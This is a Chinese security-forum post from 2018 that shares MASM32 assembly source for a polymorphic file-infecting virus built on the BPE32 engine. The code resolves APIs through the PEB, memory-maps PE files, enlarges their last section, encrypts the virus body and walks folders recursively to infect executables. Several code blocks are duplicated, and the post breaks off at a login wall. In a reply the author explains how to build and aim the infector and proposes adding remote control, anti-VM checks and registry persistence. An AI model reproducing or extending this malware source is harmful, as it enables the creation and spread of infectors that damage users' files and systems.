[原创]菜鸟用Masm32写的使用 BPE32引擎的感染型病毒-软件逆向-看雪-安全社区|安全招聘|kanxue.com

[原创]菜鸟用Masm32写的使用 BPE32引擎的感染型病毒

发表于: 2018-4-9 09:17 4324

[原创]菜鸟用Masm32写的使用 BPE32引擎的感染型病毒

漫天飞雨

2018-4-9 09:17

4324

声明：源码只讨论编程技术想分享给初学者留在硬盘难受，技术很老了过不了杀毒

首先安装Masm32到C盘然后复制文件到 C:\masm32\examples\exampl01\bmbutton 目录下

1.重定位

2.自获取Api

3.映射内存Map

4.文件最后一个节增大

5.召唤Bpe32引擎

6.遍历目标文件夹

7.修改PE文件信息

1.多次用到重定位代码地址会改变

call func_Reloc

func_Reloc:pop ebp

mov eax,ebp

sub ebp, func_Reloc

lea eax,dword ptr ss:[ebp+_LoadLibraryExA_db];

2 自获取Api

func_Begin:

mov ebx,dword ptr FS:[30h]

mov ebx,dword ptr ds:[ebx+0Ch]

mov ebx,dword ptr ds:[ebx+1Ch]

mov ebx,dword ptr ds:[ebx]

mov ebx,dword ptr ds:[ebx+08h]

mov esi,ebx

add esi,dword ptr ds:[esi+3Ch]

mov dword ptr ss:[ebp+Kernel32Base],ebx

lea eax,dword ptr ss:[ebp+_LoadLibraryExA_db]

push eax

push dword ptr ss:[ebp+Kernel32Base]

call func_GetFuncAddr

mov [_LoadLibraryExA_Addr + ebp],eax

jmp func_GetProcessAddr

func_GetFuncAddr:

mov esi,dword ptr ss:[esp+04h]

add esi,dword ptr ds:[esi+03Ch]

mov edi,dword ptr ss:[esp+08h]

mov ecx,96h

xor al,al

repne scas byte ptr es:[edi]

mov ecx,edi

sub ecx,dword ptr ss:[esp+08h]

mov edx,dword ptr ds:[esi+78h]

add edx,dword ptr ss:[esp+04h]

mov ebx,dword ptr ds:[edx+20h]

add ebx,dword ptr ss:[esp+04h]

xor eax,eax

func_GetLoadLibraryExA_3: mov edi,dword ptr ds:[ebx]

add edi,dword ptr ss:[esp+04h]

mov esi,dword ptr ss:[esp+08h]

push ecx

repe cmps byte ptr[edi],byte ptr[esi]

jnz func_GetLoadLibraryExA_1

add esp,4h

jmp func_GetLoadLibraryExA_2

func_GetLoadLibraryExA_1: pop ecx

add ebx,04h

inc eax

cmp eax,dword ptr ds:[edx+18h]

jnz func_GetLoadLibraryExA_3

func_GetLoadLibraryExA_2: cmp eax,dword ptr ds:[edx+18h]

jnz func_GetLoadLibraryExA_4

;jmp func_GetLoadLibraryExA_5

func_GetLoadLibraryExA_4 : mov esi,dword ptr ds:[edx+24h]

add esi,dword ptr ss:[esp+04h]

push edx

mov ebx,02h

xor edx,edx

mul ebx

pop edx

add eax,esi

xor ecx,ecx

mov cx,word ptr ds:[eax]

mov edi,dword ptr ds:[edx+1Ch]

xor edx,edx

mov ebx,04h

mov eax,ecx

mul ebx

add eax,dword ptr ss:[esp+04h]

add eax,edi

mov eax,dword ptr ds:[eax]

add eax,dword ptr ss:[esp+04h]

retn

func_GetProcessAddr:

lea eax,dword ptr ss:[ebp+_GetProcAddress_db]

push eax

push dword ptr ss:[ebp+Kernel32Base]

call func_GetFuncAddr

mov dword ptr [_GetProcAddress_Addr+ebp],eax

lea eax,dword ptr ss:[ebp+_KERNEL32dll_db]

push 0

PUSH 0

push eax

call dword ptr ss:[ebp+_LoadLibraryExA_Addr]

mov dword ptr ss:[ebp+Kernel32Base],eax

lea edi,dword ptr ss:[ebp+_CloseHandle_db]

mov edx,dword ptr ss:[ebp+Kernel32Base]

call func_GetAllProcAddr

jmp func_StartUseFunc

func_GetAllProcAddr:

func_GetAllProcAddr2:

mov esi,edi

xor al,al

func_GetAllProcAddr1:

scas byte ptr es:[edi]

jnz func_GetAllProcAddr1

push edx

push esi

push edx

call dword ptr ss:[ebp+_GetProcAddress_Addr]

mov dword ptr ds:[edi],eax

pop edx

add edi, 4h

cmp byte ptr ds:[edi], 0FFh

jnz func_GetAllProcAddr2

retn

func_Begin:

mov ebx,dword ptr FS:[30h]

mov ebx,dword ptr ds:[ebx+0Ch]

mov ebx,dword ptr ds:[ebx+1Ch]

mov ebx,dword ptr ds:[ebx]

mov ebx,dword ptr ds:[ebx+08h]

mov esi,ebx

add esi,dword ptr ds:[esi+3Ch]

mov dword ptr ss:[ebp+Kernel32Base],ebx

lea eax,dword ptr ss:[ebp+_LoadLibraryExA_db]

push eax

push dword ptr ss:[ebp+Kernel32Base]

call func_GetFuncAddr

mov [_LoadLibraryExA_Addr + ebp],eax

jmp func_GetProcessAddr

func_GetFuncAddr:

mov esi,dword ptr ss:[esp+04h]

add esi,dword ptr ds:[esi+03Ch]

mov edi,dword ptr ss:[esp+08h]

mov ecx,96h

xor al,al

repne scas byte ptr es:[edi]

mov ecx,edi

sub ecx,dword ptr ss:[esp+08h]

mov edx,dword ptr ds:[esi+78h]

add edx,dword ptr ss:[esp+04h]

mov ebx,dword ptr ds:[edx+20h]

add ebx,dword ptr ss:[esp+04h]

xor eax,eax

func_GetLoadLibraryExA_3: mov edi,dword ptr ds:[ebx]

add edi,dword ptr ss:[esp+04h]

mov esi,dword ptr ss:[esp+08h]

push ecx

repe cmps byte ptr[edi],byte ptr[esi]

jnz func_GetLoadLibraryExA_1

add esp,4h

jmp func_GetLoadLibraryExA_2

func_GetLoadLibraryExA_1: pop ecx

add ebx,04h

inc eax

cmp eax,dword ptr ds:[edx+18h]

jnz func_GetLoadLibraryExA_3

func_GetLoadLibraryExA_2: cmp eax,dword ptr ds:[edx+18h]

jnz func_GetLoadLibraryExA_4

;jmp func_GetLoadLibraryExA_5

func_GetLoadLibraryExA_4 : mov esi,dword ptr ds:[edx+24h]

add esi,dword ptr ss:[esp+04h]

push edx

mov ebx,02h

xor edx,edx

mul ebx

pop edx

add eax,esi

xor ecx,ecx

mov cx,word ptr ds:[eax]

mov edi,dword ptr ds:[edx+1Ch]

xor edx,edx

mov ebx,04h

mov eax,ecx

mul ebx

add eax,dword ptr ss:[esp+04h]

add eax,edi

mov eax,dword ptr ds:[eax]

add eax,dword ptr ss:[esp+04h]

retn

func_GetProcessAddr:

lea eax,dword ptr ss:[ebp+_GetProcAddress_db]

push eax

push dword ptr ss:[ebp+Kernel32Base]

call func_GetFuncAddr

mov dword ptr [_GetProcAddress_Addr+ebp],eax

lea eax,dword ptr ss:[ebp+_KERNEL32dll_db]

push 0

PUSH 0

push eax

call dword ptr ss:[ebp+_LoadLibraryExA_Addr]

mov dword ptr ss:[ebp+Kernel32Base],eax

lea edi,dword ptr ss:[ebp+_CloseHandle_db]

mov edx,dword ptr ss:[ebp+Kernel32Base]

call func_GetAllProcAddr

jmp func_StartUseFunc

func_GetAllProcAddr:

func_GetAllProcAddr2:

mov esi,edi

xor al,al

func_GetAllProcAddr1:

scas byte ptr es:[edi]

jnz func_GetAllProcAddr1

push edx

push esi

push edx

call dword ptr ss:[ebp+_GetProcAddress_Addr]

mov dword ptr ds:[edi],eax

pop edx

add edi, 4h

cmp byte ptr ds:[edi], 0FFh

jnz func_GetAllProcAddr2

retn

3.映射内存Map

;获取文件句柄

func_GetHandle:

mov ebp,ecx

;mov eax,dword ptr[esp]

; mov dword ptr[ReturnAddr+ebp],eax

lea eax,dword ptr ds:[ebp+hFilePath]

push 0 ; /hTemplateFile = NULL

push 80h ; |Attributes = NORMAL

push 03h ; |Mode = OPEN_EXISTING

push 0 ; |pSecurity = NULL

push 03h ; |ShareMode = FILE_SHARE_READ|FILE_SHARE_WRITE

push 0C0000000h ; |Access = GENERIC_READ|GENERIC_WRITE

push eax ; |FileName => "C:\1.exe"

call dword ptr ss:[ebp+_CreateFileA_Addr]

mov dword ptr ds:[hFile+ebp],eax

;创建映射Map

push 11800h ; /MapName = ""

push 0 ; |MaximumSizeLow = 0

push 0 ; |MaximumSizeHigh = 0

push 8000004h ; |Protection = PAGE_READWRITE|SEC_COMMIT

push 0 ; |pSecurity = NULL

push dword ptr ds:[hFile+ebp] ; |hFile = 00000024 (window)

call dword ptr ss:[ebp+_CreateFileMappingA_Addr]

mov dword ptr ds:[hMap+ebp],eax

;映射到进程地址

push 0 ; /MapSize = 0

push 0 ; |OffsetLow = 0

push 0 ; |OffsetHigh = 0

push 6 ; |AccessMode = 6

push dword ptr ds:[hMap+ebp] ; |hMapObject = 00000030 (window)

call dword ptr ss:[ebp+_MapViewOfFile_Addr]

mov dword ptr ds:[hMapAddr+ebp],eax

;获取文件句柄

func_GetHandle:

mov ebp,ecx

;mov eax,dword ptr[esp]

; mov dword ptr[ReturnAddr+ebp],eax

lea eax,dword ptr ds:[ebp+hFilePath]

push 0 ; /hTemplateFile = NULL

push 80h ; |Attributes = NORMAL

push 03h ; |Mode = OPEN_EXISTING

push 0 ; |pSecurity = NULL

push 03h ; |ShareMode = FILE_SHARE_READ|FILE_SHARE_WRITE

push 0C0000000h ; |Access = GENERIC_READ|GENERIC_WRITE

push eax ; |FileName => "C:\1.exe"

call dword ptr ss:[ebp+_CreateFileA_Addr]

mov dword ptr ds:[hFile+ebp],eax

;创建映射Map

push 11800h ; /MapName = ""

push 0 ; |MaximumSizeLow = 0

push 0 ; |MaximumSizeHigh = 0

push 8000004h ; |Protection = PAGE_READWRITE|SEC_COMMIT

push 0 ; |pSecurity = NULL

push dword ptr ds:[hFile+ebp] ; |hFile = 00000024 (window)

call dword ptr ss:[ebp+_CreateFileMappingA_Addr]

mov dword ptr ds:[hMap+ebp],eax

;映射到进程地址

push 0 ; /MapSize = 0

push 0 ; |OffsetLow = 0

push 0 ; |OffsetHigh = 0

push 6 ; |AccessMode = 6

push dword ptr ds:[hMap+ebp] ; |hMapObject = 00000030 (window)

call dword ptr ss:[ebp+_MapViewOfFile_Addr]

mov dword ptr ds:[hMapAddr+ebp],eax

4.文件最后一个节增大

;获得文件大小

push 2 ; /Origin = FILE_END

push 0 ; |pOffsetHi = NULL

push 0 ; |OffsetLo = 0

push dword ptr ds:[hFile+ebp] ; |hFile = 00000024 (window)

call dword ptr ss:[ebp+_SetFilePointer_Addr]

mov dword ptr ds:[FileSize+ebp],eax

;为文件添加大小

push 2 ; /Origin = FILE_END

push 0 ; |pOffsetHi = NULL

push 10000h ; |OffsetLo = 0

push dword ptr ds:[hFile+ebp] ; |hFile = 00000024 (window)

call dword ptr ss:[ebp+_SetFilePointer_Addr]

push dword ptr ds:[hFile+ebp]

call dword ptr ss:[ebp+_SetEndOfFile_Addr]

;获得文件大小

push 2 ; /Origin = FILE_END

push 0 ; |pOffsetHi = NULL

push 0 ; |OffsetLo = 0

push dword ptr ds:[hFile+ebp] ; |hFile = 00000024 (window)

call dword ptr ss:[ebp+_SetFilePointer_Addr]

mov dword ptr ds:[FileSize+ebp],eax

;为文件添加大小

push 2 ; /Origin = FILE_END

push 0 ; |pOffsetHi = NULL

push 10000h ; |OffsetLo = 0

push dword ptr ds:[hFile+ebp] ; |hFile = 00000024 (window)

call dword ptr ss:[ebp+_SetFilePointer_Addr]

push dword ptr ds:[hFile+ebp]

call dword ptr ss:[ebp+_SetEndOfFile_Addr]

5.召唤Bpe32引擎

mov dword ptr[lplpJumpMain1+ebp],ecx

mov edx,dword ptr[lpVirusSrc1+ebp]

sub ecx,edx

add ecx,200h

mov edx,dword ptr[lplpJumpMain1+ebp]

mov eax,dword ptr[lpVirusSrc1+ebp]

mov ecx,2800h

mov esi,ebp

invoke BPE32,eax,ebx,ecx,edx

mov dword ptr[lplpJumpMain1+ebp],ecx

mov edx,dword ptr[lpVirusSrc1+ebp]

sub ecx,edx

add ecx,200h

mov edx,dword ptr[lplpJumpMain1+ebp]

mov eax,dword ptr[lpVirusSrc1+ebp]

mov ecx,2800h

mov esi,ebp

invoke BPE32,eax,ebx,ecx,edx

6.遍历目标文件夹

GetVirPath:

push ebp

mov ebx,ebp

mov ebp,esp

push 0FFFFFFFFh

push eax ; SE 处理程序安装

mov eax,dword ptr fs:[0]

push eax

mov dword ptr fs:[0],esp

push ecx

sub esp,039Ch

push ebx

push esi

push edi

mov dword ptr ss:[ebp-010h],esp

mov dword ptr ss:[ebp-04],00

X10040106A :mov eax,dword ptr[ebp+08]

push ebx

push eax ; /s = "C:\Program Files (x86)"

call strlen

add esp,04

pop ebx

mov dword ptr ss:[ebp-014h],eax

cmp dword ptr ss:[ebp+08],00

je X100401085

cmp dword ptr ss:[ebp-014h],00

jg X10040108A

X100401085: jmp X10040129D

X10040108A: mov ecx,dword ptr ss:[ebp+08]

push ebx

push ecx ; /src

lea edx,dword ptr ss:[ebp-0118h] ; |

push edx ; |dest

call strcpy

add esp,8

pop ebx

mov eax,dword ptr ss:[ebp+08]

add eax,dword ptr ss:[ebp-014h]

movsx ecx,byte ptr ds:[eax-01]

cmp ecx,05Ch

je X1004010C0

lea edx,dword ptr[strcat_XieGan+ebx]

push ebx

push edx ; /src = "\"

lea edx,dword ptr ss:[ebp-0118h] ; |

push edx ; |dest

call strcat

add esp,08

pop ebx

lea eax,dword ptr[strcat_XinHao+ebx]

X1004010C0: push ebx

push eax ; /src = "*"

lea eax,dword ptr ss:[ebp-0118h] ; |

push eax ; |dest

call strcat

add esp,08

pop ebx

push ebx

lea ecx,dword ptr ss:[ebp-0258h]

push ecx ; /pFindFileData

lea edx,dword ptr ss:[ebp-0118h] ; |

push edx ; |FileName

call dword ptr[_FindFirstFileA_Addr+ebx]; \FindFirstFileA

pop ebx

mov dword ptr ss:[ebp-025Ch],eax

cmp dword ptr ss:[ebp-025Ch],-01

jnz X100401109

mov eax,dword ptr ss:[ebp-025Ch]

push ebx

push eax ; /hSearch

call dword ptr[_FindClose_Addr+ebx]; \FindClose

pop ebx

jmp X10040129D

X100401109 : mov dword ptr ss:[ebp-0364h],01

mov dword ptr ss:[ebp-036Ch],0

X10040111D : cmp dword ptr ss:[ebp-036Ch],00

jnz X100401281

mov ecx,dword ptr ss:[ebp+08]

push ebx

push ecx ; /src

lea edx,dword ptr ss:[ebp-0360h] ; |

push edx ; |dest

call strcpy

add esp,08

pop ebx

mov eax,dword ptr ss:[ebp+08]

add eax,dword ptr ss:[ebp-014h]

movsx ecx,byte ptr ds:[eax-01]

cmp ecx,05Ch

je X100401160

lea edx,dword ptr[strcat_XieGan+ebx]

push ebx

push edx ; /src = "\"

lea edx,dword ptr ss:[ebp-0360h] ; |

push edx ; |dest

call strcat

add esp,08

pop ebx

X100401160:lea eax,dword ptr ss:[ebp-022Ch]

push ebx

push eax ; /src

lea ecx,dword ptr ss:[ebp-0360h] ; |

push ecx ; |dest

call strcat

add esp,08

pop ebx

mov edx,dword ptr ss:[ebp-0258h]

and edx,010h

neg edx

sbb edx,edx

neg edx

mov dword ptr ss:[ebp-0368h],edx

cmp dword ptr ss:[ebp-0368h],00

je X1004011E8

lea eax,dword ptr[strcat_YiDian+ebx]

push ebx

push eax ; /s2 = "."

lea eax,dword ptr ss:[ebp-022Ch] ; |

push eax ; |s1

call strcmp

add esp,08

pop ebx

test eax,eax

je X1004011C4

lea ecx,dword ptr[strcat_ErDian+ebx]

push ebx

push ecx ; /s2 = ".."

lea ecx,dword ptr ss:[ebp-022Ch] ; |

push ecx

call strcmp

add esp,08

pop ebx

test eax,eax

jnz X1004011E8

X1004011C4: lea edx,dword ptr ss:[ebp-0258h]

push ebx

push edx ; /pFindFileData

mov eax,dword ptr ss:[ebp-025Ch] ; |

push eax ; |hFile

call dword ptr[_FindNextFileA_Addr+ebx]; \FindNextFileA

pop ebx

neg eax

sbb eax,eax

inc eax

mov dword ptr ss:[ebp-036Ch],eax

jmp X10040111D

X1004011E8 : cmp dword ptr ss:[ebp+014h],0

je X10040122F

mov ecx,dword ptr ss:[ebp+010h]

cmp ecx,dword ptr ss:[ebp-0368h]

je X10040122F

mov edx,dword ptr ss:[ebp+018h]

push ebx

push edx

lea eax,dword ptr ss:[ebp-0360h]

push eax

;call dword ptr ss:[ebp+014h]

call GetVirPath2

pop ebx

mov dword ptr ss:[ebp-0364h],eax

cmp dword ptr ss:[ebp-0364h],00

jnz X10040122F

mov ecx,dword ptr ss:[ebp-025Ch]

push ebx

push ecx ; /hSearch

call dword ptr[_FindClose_Addr+ebx]; \FindClose

pop ebx

jmp X10040129D

X10040122F :cmp dword ptr ss:[ebp-0368h],00

je X10040125D

cmp dword ptr ss:[ebp+0Ch],00

je X10040125D

mov edx,dword ptr ss:[ebp+018h]

push ebx

push edx

mov eax,dword ptr ss:[ebp+014h]

push eax

mov ecx,dword ptr ss:[ebp+010h]

push ecx

mov edx,dword ptr ss:[ebp+0Ch]

push edx

lea eax,dword ptr ss:[ebp-0360h]

push eax

call GetVirPath

add esp,014h

pop ebx

X10040125D : lea ecx,dword ptr ss:[ebp-0258h]

push ebx

push ecx ; /pFindFileData

mov edx,dword ptr ss:[ebp-025Ch] ; |

push edx ; |hFile

call dword ptr[_FindNextFileA_Addr+ebx]; \FindNextFileA

pop ebx

neg eax

sbb eax,eax

inc eax

mov dword ptr ss:[ebp-036Ch],eax

jmp X10040111D

X100401281: mov eax,dword ptr ss:[ebp-025Ch]

push ebx

push eax ; /hSearch

call dword ptr[_FindClose_Addr+ebx]; \FindClose

pop ebx

jmp X100401296

mov eax,X10040129D

retn

X100401296: mov dword ptr ss:[ebp-04],-01

X10040129D : mov ecx,dword ptr ss:[ebp-0Ch]

mov dword ptr fs:[0],ecx

pop edi

pop esi

pop ebx

mov esp,ebp

pop ebp

retn

GetVirPath:

push ebp

mov ebx,ebp

mov ebp,esp

push 0FFFFFFFFh

push eax ; SE 处理程序安装

mov eax,dword ptr fs:[0]

push eax

mov dword ptr fs:[0],esp

push ecx

sub esp,039Ch

push ebx

push esi

push edi

mov dword ptr ss:[ebp-010h],esp

mov dword ptr ss:[ebp-04],00

X10040106A :mov eax,dword ptr[ebp+08]

push ebx

push eax ; /s = "C:\Program Files (x86)"

call strlen

add esp,04

pop ebx

mov dword ptr ss:[ebp-014h],eax

cmp dword ptr ss:[ebp+08],00

je X100401085

cmp dword ptr ss:[ebp-014h],00

jg X10040108A

X100401085: jmp X10040129D

X10040108A: mov ecx,dword ptr ss:[ebp+08]

push ebx

push ecx ; /src

lea edx,dword ptr ss:[ebp-0118h] ; |

push edx ; |dest

call strcpy

add esp,8

pop ebx

mov eax,dword ptr ss:[ebp+08]

add eax,dword ptr ss:[ebp-014h]

movsx ecx,byte ptr ds:[eax-01]

cmp ecx,05Ch

je X1004010C0

lea edx,dword ptr[strcat_XieGan+ebx]

push ebx

push edx ; /src = "\"

lea edx,dword ptr ss:[ebp-0118h] ; |

push edx ; |dest

call strcat

add esp,08

pop ebx

lea eax,dword ptr[strcat_XinHao+ebx]

X1004010C0: push ebx

push eax ; /src = "*"

lea eax,dword ptr ss:[ebp-0118h] ; |

push eax ; |dest

call strcat

add esp,08

pop ebx

push ebx

lea ecx,dword ptr ss:[ebp-0258h]

push ecx ; /pFindFileData

lea edx,dword ptr ss:[ebp-0118h] ; |

push edx ; |FileName

call dword ptr[_FindFirstFileA_Addr+ebx]; \FindFirstFileA

pop ebx

mov dword ptr ss:[ebp-025Ch],eax

cmp dword ptr ss:[ebp-025Ch],-01

jnz X100401109

mov eax,dword ptr ss:[ebp-025Ch]

push ebx

push eax ; /hSearch

call dword ptr[_FindClose_Addr+ebx]; \FindClose

pop ebx

jmp X10040129D

X100401109 : mov dword ptr ss:[ebp-0364h],01

登录后可查看完整内容

[培训]内核驱动高级班，冲击BAT一流互联网大厂工作，每周日13:00-18:00直播授课

最后于 2018-4-12 19:40 被漫天飞雨编辑，原因：

收藏・2

免费・1

支持

最新回复 (2)
奔跑的阿狸雪币： 3535 活跃值： (4649) 能力值： ( LV13，RANK：437 ) 在线值：发帖 29 回帖 136 粉丝 25 关注私信	奔跑的阿狸 1 2 楼 2018-4-9 10:34 0
漫天飞雨雪币： 221 活跃值： (25) 能力值： ( LV3，RANK：20 ) 在线值：发帖 1 回帖 2 粉丝 0 关注私信	漫天飞雨 3 楼写的不够完美，有很多bug，还有堆栈溢出，思路有的首先编译完把他的代码段属性改为可以写，inc文件可以修改感染目录 WriteVirPath db "C:\1 " ; C盘下1文件夹。我传个附件给大家作为宿主程序拷贝到 C:\1目录下还可以改进的地方，比如说加远控，加对抗虚拟机，2次加密病毒体，优化遍历函数防止堆栈溢出，创建多线程，修改注册表，内存运行代码，创建互斥体，等吧最后于 2018-4-9 12:04 被漫天飞雨编辑，原因： 2018-4-9 11:22 0
	游客登录 \| 注册方可回帖回帖表情雪币赚取及消费高级回复

漫天飞雨

发帖

回帖

RANK

关注

私信

他的文章

[原创]菜鸟用Masm32写的使用 BPE32引擎的感染型病毒 4325

关于我们

联系我们

企业服务

看雪公众号

最新回复 (2)
奔跑的阿狸雪币： 3535 活跃值： (4649) 能力值： ( LV13，RANK：437 ) 在线值：发帖 29 回帖 136 粉丝 25 关注私信	奔跑的阿狸 1 2 楼 2018-4-9 10:34 0
漫天飞雨雪币： 221 活跃值： (25) 能力值： ( LV3，RANK：20 ) 在线值：发帖 1 回帖 2 粉丝 0 关注私信	漫天飞雨 3 楼写的不够完美，有很多bug，还有堆栈溢出，思路有的首先编译完把他的代码段属性改为可以写，inc文件可以修改感染目录 WriteVirPath db "C:\1 " ; C盘下1文件夹。我传个附件给大家作为宿主程序拷贝到 C:\1目录下还可以改进的地方，比如说加远控，加对抗虚拟机，2次加密病毒体，优化遍历函数防止堆栈溢出，创建多线程，修改注册表，内存运行代码，创建互斥体，等吧最后于 2018-4-9 12:04 被漫天飞雨编辑，原因： 2018-4-9 11:22 0
	游客登录 \| 注册方可回帖回帖表情雪币赚取及消费高级回复